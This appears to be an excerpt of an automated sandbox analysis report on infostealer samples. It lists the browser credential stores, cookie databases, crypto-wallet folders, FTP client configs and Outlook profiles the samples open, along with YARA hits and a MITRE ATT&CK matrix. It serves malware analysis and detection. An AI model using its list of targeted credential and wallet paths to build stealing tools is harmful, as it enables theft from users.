                                      Source: C:\YQNZByFp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk
                                      Source: C:\YQNZByFp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf
                                      Source: C:\YQNZByFp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec
                                      Source: C:\YQNZByFp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd
                                      Source: C:\YQNZByFp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje
                                      Source: C:\YQNZByFp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc
                                      Source: C:\YQNZByFp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-walJump to behavior
                                      Source: C:\YQNZByFp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf
                                      Source: C:\YQNZByFp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.db
                                      Source: C:\YQNZByFp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm
                                      Source: C:\YQNZByFp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqlite
                                      Source: C:\YQNZByFp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic
                                      Source: C:\YQNZByFp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd
                                      Source: C:\YQNZByFp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi
                                      Source: C:\YQNZByFp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap
                                      Source: C:\YQNZByFp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh
                                      Source: C:\YQNZByFp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa
                                      Source: C:\YQNZByFp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn
                                      Source: C:\YQNZByFp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad
                                      Source: C:\YQNZByFp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.json
                                      Source: C:\YQNZByFp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc
                                      Source: C:\YQNZByFp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg
                                      Source: C:\YQNZByFp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh
                                      Source: C:\YQNZByFp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa
                                      Source: C:\YQNZByFp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                                      Source: C:\YQNZByFp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
                                      Source: C:\YQNZByFp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-shmJump to behavior
                                      Source: C:\YQNZByFp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak
                                      Source: C:\YQNZByFp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
                                      Source: C:\YQNZByFp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo
                                      Source: C:\YQNZByFp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp
                                      Source: C:\YQNZByFp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
                                      Source: C:\YQNZByFp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
                                      Source: C:\YQNZByFp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb
                                      Source: C:\YQNZByFp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch
                                      Source: C:\YQNZByFp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm
                                      Source: C:\YQNZByFp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch
                                      Source: C:\YQNZByFp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe
                                      Source: C:\YQNZByFp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj
                                      Source: C:\YQNZByFp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne
                                      Source: C:\YQNZByFp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk
                                      Source: C:\YQNZByFp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-shmJump to behavior
                                      Source: C:\YQNZByFp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil
                                      Source: C:\YQNZByFp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac
                                      Source: C:\YQNZByFp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno
                                      Source: C:\YQNZByFp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig
                                      Source: C:\YQNZByFp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg
                                      Source: C:\YQNZByFp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb
                                      Source: C:\YQNZByFp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
                                      Source: C:\YQNZByFp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba
                                      Source: C:\YQNZByFp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla
                                      Source: C:\YQNZByFp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih
                                      Source: C:\YQNZByFp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge
                                      Source: C:\YQNZByFp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik
                                      Source: C:\YQNZByFp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad
                                      Source: C:\YQNZByFp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-walJump to behavior
                                      Source: C:\YQNZByFp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb
                                      Source: C:\YQNZByFp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp
                                      Source: C:\YQNZByFp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                                      Source: C:\YQNZByFp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj
                                      Source: C:\YQNZByFp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetter
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xmlJump to behavior
                                      Source: C:\YQNZByFp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfo
                                      Source: C:\YQNZByFp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites
                                      Source: C:\YQNZByFp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Roaming\FTPbox
                                      Source: C:\YQNZByFp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Roaming\FTPRush
                                      Source: C:\YQNZByFp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla
                                      Source: C:\YQNZByFp\jyidkjkfhjawd.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTP
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\Jump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\Jump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\Jump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\Jump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeFile opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\Jump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeFile opened: C:\Users\user\AppData\Roaming\MultiDoge\Jump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeFile opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\Jump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\Jump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\Jump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeFile opened: C:\Users\user\AppData\Roaming\Binance\Jump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeFile opened: C:\Users\user\AppData\Roaming\Coinomi\Coinomi\wallets\Jump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\Jump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Jump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\Jump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeFile opened: C:\Users\user\AppData\Roaming\atomic_qt\config\Jump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeFile opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\Jump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\Jump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\Jump to behavior
                                      Source: C:\YQNZByFp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\YQNZByFp\jyidkjkfhjawd.exe | File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\YQNZByFp\jyidkjkfhjawd.exe | File opened: C:\Users\user\AppData\Roaming\Ledger Live
Source: C:\YQNZByFp\jyidkjkfhjawd.exe | File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
Source: C:\YQNZByFp\jyidkjkfhjawd.exe | File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\YQNZByFp\jyidkjkfhjawd.exe | File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\YQNZByFp\jyidkjkfhjawd.exe | File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
Source: C:\YQNZByFp\jyidkjkfhjawd.exe | File opened: C:\Users\user\AppData\Roaming\Binance
Source: C:\YQNZByFp\jyidkjkfhjawd.exe | File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
Source: C:\YQNZByFp\jyidkjkfhjawd.exe | File opened: C:\Users\user\AppData\Roaming\Electrum\wallets
Source: C:\YQNZByFp\jyidkjkfhjawd.exe | File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
Source: C:\YQNZByFp\jyidkjkfhjawd.exe | File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB
Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001
Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002
Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003
Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000004
Source: C:\Users\user\Desktop\5EfYBe3nch.exe | Directory queried: C:\Users\user\Documents
Source: C:\Users\user\Desktop\5EfYBe3nch.exe | Directory queried: C:\Users\user\Documents
Source: C:\Users\user\Desktop\5EfYBe3nch.exe | Directory queried: C:\Users\user\Documents\NWTVCDUMOB
Source: C:\Users\user\Desktop\5EfYBe3nch.exe | Directory queried: C:\Users\user\Documents\NWTVCDUMOB
Source: C:\Users\user\Desktop\5EfYBe3nch.exe | Directory queried: C:\Users\user\Documents
Source: C:\Users\user\Desktop\5EfYBe3nch.exe | Directory queried: C:\Users\user\Documents
Source: C:\Users\user\Desktop\5EfYBe3nch.exe | Directory queried: C:\Users\user\Documents\LTKMYBSEYZ
Source: C:\Users\user\Desktop\5EfYBe3nch.exe | Directory queried: C:\Users\user\Documents\LTKMYBSEYZ
Source: C:\Users\user\Desktop\5EfYBe3nch.exe | Directory queried: C:\Users\user\Documents\ONBQCLYSPU
Source: C:\Users\user\Desktop\5EfYBe3nch.exe | Directory queried: C:\Users\user\Documents\ONBQCLYSPU
Source: C:\Users\user\Desktop\5EfYBe3nch.exe | Directory queried: C:\Users\user\Documents\RAYHIWGKDI
Source: C:\Users\user\Desktop\5EfYBe3nch.exe | Directory queried: C:\Users\user\Documents\RAYHIWGKDI
Source: C:\Users\user\Desktop\5EfYBe3nch.exe | Directory queried: C:\Users\user\Documents\VLZDGUKUTZ
Source: C:\Users\user\Desktop\5EfYBe3nch.exe | Directory queried: C:\Users\user\Documents\VLZDGUKUTZ
Source: C:\Users\user\Desktop\5EfYBe3nch.exe | Directory queried: C:\Users\user\Documents\ONBQCLYSPU
Source: C:\Users\user\Desktop\5EfYBe3nch.exe | Directory queried: C:\Users\user\Documents\ONBQCLYSPU
Source: Yara match | File source: 0.3.5EfYBe3nch.exe.14b4ba0.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000002.00000002.2278140862.0000000000F0E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.1726694915.00000000014B2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.1743404836.00000000014AC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.2273078519.00000000007FC000.00000040.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: 5EfYBe3nch.exe PID: 7268, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: DLTDCR8UJINP8YM8Y.exe PID: 7656, type: MEMORYSTR

                                      Remote Access Functionality

Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""
Source: Yara match | File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\10DCQZI[1].exe, type: DROPPED
Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\1027002001\10DCQZI.exe, type: DROPPED
Source: Yara match | File source: Process Memory Space: 5EfYBe3nch.exe PID: 7268, type: MEMORYSTR
Source: Yara match | File source: 00000010.00000002.2504667961.00000000006E1000.00000040.00000001.01000000.00000010.sdmp, type: MEMORY
Source: Yara match | File source: 00000010.00000003.2453745116.0000000004E30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: iSHmPkn.exe PID: 7540, type: MEMORYSTR
Source: Yara match | File source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000002.00000002.2278140862.0000000000F0E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.2273078519.0000000000731000.00000040.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: DLTDCR8UJINP8YM8Y.exe PID: 7656, type: MEMORYSTR
Source: Yara match | File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: DLTDCR8UJINP8YM8Y.exe PID: 7656, type: MEMORYSTR
Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exe | Code function: 2_2_6C540C40 sqlite3_bind_zeroblob, 2_2_6C540C40
Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exe | Code function: 2_2_6C540D60 sqlite3_bind_parameter_name, 2_2_6C540D60
Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exe | Code function: 2_2_6C468EA0 sqlite3_clear_bindings, 2_2_6C468EA0
Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exe | Code function: 2_2_6C540B40 sqlite3_bind_value, sqlite3_bind_int64, sqlite3_bind_double, sqlite3_bind_zeroblob, 2_2_6C540B40
Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exe | Code function: 2_2_6C466410 bind, WSAGetLastError, 2_2_6C466410
Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exe | Code function: 2_2_6C46C050 sqlite3_bind_parameter_index, strlen, strncmp, strncmp, 2_2_6C46C050
Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exe | Code function: 2_2_6C466070 PR_Listen, 2_2_6C466070
Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exe | Code function: 2_2_6C46C030 sqlite3_bind_parameter_count, 2_2_6C46C030
Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exe | Code function: 2_2_6C4660B0 listen, WSAGetLastError, 2_2_6C4660B0
Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exe | Code function: 2_2_6C3F22D0 sqlite3_bind_blob, 2_2_6C3F22D0
Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exe | Code function: 2_2_6C4663C0 PR_Bind, 2_2_6C4663C0
Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exe | Code function: 2_2_6C469400 sqlite3_bind_int64, 2_2_6C469400
Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exe | Code function: 2_2_6C4694C0 sqlite3_bind_text, 2_2_6C4694C0
Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exe | Code function: 2_2_6C4694F0 sqlite3_bind_text16, 2_2_6C4694F0
Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exe | Code function: 2_2_6C469480 sqlite3_bind_null, 2_2_6C469480
MITRE ATT&CK Matrix (a number before a technique name is the count of matched signatures for that technique; columns are the ATT&CK tactics)

Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | 1 Scripting | Valid Accounts | 12 Windows Management Instrumentation | 1 Scripting | 1 DLL Side-Loading | 11 Disable or Modify Tools | 2 OS Credential Dumping | 1 System Time Discovery | Remote Services | 1 Archive Collected Data | 1 Ingress Tool Transfer | Exfiltration Over Other Network Medium | Abuse Accessibility Features
Credentials | Domains | Default Accounts | 2 Native API | 1 DLL Side-Loading | 1 Extra Window Memory Injection | 11 Deobfuscate/Decode Files or Information | LSASS Memory | 12 File and Directory Discovery | Remote Desktop Protocol | 41 Data from Local System | 2 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | 1 Exploitation for Client Execution | 11 Scheduled Task/Job | 12 Process Injection | 3 Obfuscated Files or Information | Security Account Manager | 249 System Information Discovery | SMB/Windows Admin Shares | 11 Email Collection | 1 Remote Access Software | Automated Exfiltration | Data Encrypted for Impact
